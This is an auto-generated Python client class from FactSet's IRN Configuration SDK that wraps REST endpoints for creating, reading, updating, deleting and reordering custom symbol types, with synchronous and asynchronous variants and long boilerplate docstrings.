from fds.sdk.IRNConfiguration.exceptions import ApiException
from fds.sdk.IRNConfiguration.model.custom_symbol_custom_field_config_dto import CustomSymbolCustomFieldConfigDto
from fds.sdk.IRNConfiguration.model.custom_symbol_type_detail_dto import CustomSymbolTypeDetailDto
from fds.sdk.IRNConfiguration.model.custom_symbol_type_dto import CustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.new_item_dto import NewItemDto
from fds.sdk.IRNConfiguration.model.problem_details import ProblemDetails
from fds.sdk.IRNConfiguration.model.reorder_custom_symbol_type_dto import ReorderCustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.save_custom_symbol_type_dto import SaveCustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.update_custom_symbol_type_dto import UpdateCustomSymbolTypeDto
class CustomSymbolsTypesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.create_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 201: (NewItemDto,), 400: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types',
'operation_id': 'create_custom_symbol_type',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'save_custom_symbol_type_dto',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'save_custom_symbol_type_dto':
(SaveCustomSymbolTypeDto,),
},
'attribute_map': {
},
'location_map': {
'save_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
self.delete_custom_symbol_type_async_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'delete_custom_symbol_type_async',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (CustomSymbolTypeDetailDto,), 404: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'get_custom_symbol_type',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_custom_symbol_types_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: ([CustomSymbolTypeDto],), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types',
'operation_id': 'get_custom_symbol_types',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_symbol_custom_fields_for_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: ([CustomSymbolCustomFieldConfigDto],), 404: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}/custom-fields',
'operation_id': 'get_symbol_custom_fields_for_custom_symbol_type',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'update_custom_symbol_type',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
'update_custom_symbol_type_dto',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
'update_custom_symbol_type_dto':
(UpdateCustomSymbolTypeDto,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
'update_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
self.update_custom_symbol_type_order_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/reorder',
'operation_id': 'update_custom_symbol_type_order',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'reorder_custom_symbol_type_dto',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'reorder_custom_symbol_type_dto':
(ReorderCustomSymbolTypeDto,),
},
'attribute_map': {
},
'location_map': {
'reorder_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def create_custom_symbol_type(
self,
**kwargs
) -> NewItemDto:
"""Create a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
NewItemDto
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def create_custom_symbol_type_with_http_info(
self,
**kwargs
) -> typing.Tuple[NewItemDto, int, typing.MutableMapping]:
"""Create a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
NewItemDto
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def create_custom_symbol_type_async(
self,
**kwargs
) -> "ApplyResult[NewItemDto]":
"""Create a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[NewItemDto]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def create_custom_symbol_type_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[NewItemDto, int, typing.MutableMapping]]":
"""Create a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(NewItemDto, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> None:
"""Delete a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""Delete a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[None]":
"""Delete a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""Delete a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> CustomSymbolTypeDetailDto:
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
CustomSymbolTypeDetailDto
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[CustomSymbolTypeDetailDto, int, typing.MutableMapping]:
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
CustomSymbolTypeDetailDto
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[CustomSymbolTypeDetailDto]":
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[CustomSymbolTypeDetailDto]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[CustomSymbolTypeDetailDto, int, typing.MutableMapping]]":
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(CustomSymbolTypeDetailDto, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types(
self,
**kwargs
) -> [CustomSymbolTypeDto]:
"""Get all the custom symbol types # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolTypeDto]
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types_with_http_info(
self,
**kwargs
) -> typing.Tuple[[CustomSymbolTypeDto], int, typing.MutableMapping]:
"""Get all the custom symbol types # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolTypeDto]
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types_async(
self,
**kwargs
) -> "ApplyResult[[CustomSymbolTypeDto]]":
"""Get all the custom symbol types # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[[CustomSymbolTypeDto]]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[[CustomSymbolTypeDto], int, typing.MutableMapping]]":
"""Get all the custom symbol types # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[([CustomSymbolTypeDto], int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> [CustomSymbolCustomFieldConfigDto]:
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fileds
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolCustomFieldConfigDto]
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[[CustomSymbolCustomFieldConfigDto], int, typing.MutableMapping]:
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fileds
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolCustomFieldConfigDto]
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
